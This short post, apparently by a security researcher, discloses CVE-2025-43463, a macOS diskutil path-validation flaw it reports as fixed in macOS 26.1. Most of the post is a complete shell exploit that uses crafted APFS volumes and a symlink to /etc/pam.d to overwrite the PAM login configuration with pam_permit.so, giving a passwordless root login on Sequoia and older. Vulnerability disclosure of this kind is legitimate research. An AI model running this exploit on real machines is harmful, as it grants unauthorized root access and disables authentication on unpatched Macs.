After this was fixed, I found a nearly identical bug in diskutil apfs updatePreboot. I reported it in September 2025, and it was fixed in macOS 26.1:
Impact: An app may be able to access sensitive user data
Description: A parsing issue in the handling of directory paths was addressed with improved path validation.
CVE-2025-43463: Amy (@asentientbot), Mickey Jin (@patch1t)
Unfortunately (for me), Mickey Jin found it first! So I didn't get a bounty.
Sequoia and older are still vulnerable.
As before, it will login as root.
whole=$(hdiutil attach -nomount -plist ram://10000000 | plutil -extract system-entities.0.dev-entry raw -)
diskutil apfs createcontainer $whole
container=$(diskutil info -plist $whole | plutil -extract APFSContainerReference raw -)
diskutil apfs addvolume $container APFS evil_data -role D
diskutil apfs addvolume $container APFS evil_system -role S -sibling evil_data
diskutil apfs addvolume $container APFS evil_preboot -role B
bugInput=/Volumes/evil_system/usr/standalone/i386/EfiLoginUI
bugOutput=/Volumes/evil_preboot/$(diskutil info -plist evil_system | plutil -extract VolumeUUID raw -)/usr/standalone/i386/EfiLoginUI
mkdir -p $bugInput
mkdir -p $(dirname $bugOutput)
echo 'auth sufficient pam_permit.so
account sufficient pam_permit.so
session sufficient pam_permit.so' > $bugInput/login
ln -s /etc/pam.d "$bugOutput"
diskutil apfs updatepreboot evil_system
login root